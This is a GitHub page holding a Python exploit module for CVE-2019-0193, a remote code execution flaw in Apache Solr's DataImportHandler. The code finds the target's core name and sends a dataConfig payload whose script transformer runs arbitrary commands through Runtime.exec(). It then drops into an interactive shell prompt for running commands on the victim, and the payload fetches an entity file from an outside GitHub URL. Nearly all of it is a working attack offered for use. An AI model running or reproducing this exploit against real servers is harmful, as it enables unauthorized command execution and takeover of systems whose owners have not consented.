-
Notifications
You must be signed in to change notification settings - Fork 1
/
cve-2019-0193.py
executable file
·127 lines (113 loc) · 4.52 KB
/
cve-2019-0193.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Name: Example module file
Creator: K4YT3X
Date Created: June 22, 2021
Last Modified: June 22, 2021
Note: the code in run is not written by me
"""
import json
import requests
import sys
class Module:
def __init__(self, logger):
self.logger = logger
self.options = {
"url": {"value": None, "required": True},
}
def info(self):
return """DES: by zhzyker as https://github.com/zhzyker/exphub
Solr DataImportHandler Commons Remote Code Execution"""
def run(self):
for key in self.options:
if (
self.options[key]["value"] is None
and self.options[key]["required"] is True
):
self.logger.error("Required key {} is not set".format(key))
return
if not self.options["url"]["value"].startswith("http"):
url = "http:https://" + self.options["url"]["value"]
else:
url = self.options["url"]["value"]
vuln_url = url + "/solr/test/dataimport"
cmd = "whoami"
# url_cmd = urllib.parse.quote(cmd, safe="")
# get core name
core_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
r = requests.request("GET", url=core_url, timeout=20)
core_name = list(json.loads(r.text)["status"])[0]
except Exception:
print("\033[33mVulnerability does not exist.\033[0m")
sys.exit(0)
# check mode
mode_url = url + "/solr/" + core_name + "/admin/mbeans?cat=QUERY&wt=json"
r = requests.request("GET", url=mode_url, timeout=20)
mode = dict(dict(list(json.loads(r.text)["solr-mbeans"])[1])["/dataimport"])[
"class"
]
if "org.apache.solr.handler.dataimport.DataImportHandler" in mode:
print("\033[32m[INFO]\033[0m Find more:" + mode)
else:
print("\033[33mVulnerability does not exist.\033[0m")
sys.exit(0)
exp_url = url + "/solr/" + core_name + "/dataimport"
headers = {
"Host": "localhost:8983",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "zip, deflate",
"Referer": "" + url + "/solr/",
"Content-type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Content-Length": "1007",
"Connection": "close",
}
def _do_exp(cmd):
payload = """
command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("{}").getInputStream()));
var result = [];
while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}
row.put("title",result.join("\\n\\r"));
return row;
}
]]></script>
<document>
<entity name="entity1"
url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
processor="XPathEntityProcessor"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>
""".format(
cmd
)
r = requests.request(
"POST", url=exp_url, data=payload, headers=headers, timeout=30
)
try:
get_r = list(json.loads(r.text)["documents"])[0]
q = dict(get_r)["title"]
print(q)
except Exception:
print("[*] Please wait... ... (About 1 minute)")
while 1:
cmd = input("[SHELL] terminal > ")
if cmd == "exit":
exit(0)
_do_exp(cmd)